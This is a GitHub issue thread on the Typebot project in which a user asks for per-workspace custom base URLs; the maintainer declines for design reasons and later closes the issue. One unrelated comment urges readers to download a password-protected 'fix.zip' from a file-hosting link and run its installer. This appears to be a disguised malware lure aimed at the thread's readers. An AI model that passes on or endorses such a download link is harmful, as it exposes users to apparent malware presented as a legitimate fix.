### ISSUE TITLE
Allow Custom BaseURL Configuration for Each Workspace

### ISSUE THREAD

**Issue by admdanielspalma** [baptisteArno/typebot.io#1747]
I'm currently running a self-hosted Typebot instance and have set up multiple domains, all pointing to the same instance. However, I can only access the bots/flows through the main baseURL. I would like to request a feature that allows setting custom baseURLs for each workspace so that each one can be accessed via its own unique domain.

This feature would be extremely useful in scenarios where a single Typebot server is used to host different workspaces, each associated with a different domain. This would allow us to provide a more tailored experience for each client or project, with each workspace accessible through its own domain.

Add a feature that allows custom baseURL configuration for each workspace within a single Typebot instance, enabling multiple domains to be used effectively.

Benefits:
More personalized experience for users and clients using different domains.

Thank you for considering this feature, and I hope it can be evaluated for future inclusion!

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by baptisteArno** [comment]
I see the point. This is a design choice and it would be difficult to enable this at this stage of the project. 🙏

**Comment by admdanielspalma** [comment]
I understand... but will you keep the idea alive for some future oportunity?

Thanks!

**Comment by Hakkinn** [comment]
Great idea, we need it URGENTLY!

**Comment by baptisteArno** [comment]
Closing, feel free to re-open

**Comment by eusonntag** [comment]
I need it URGENTLY!
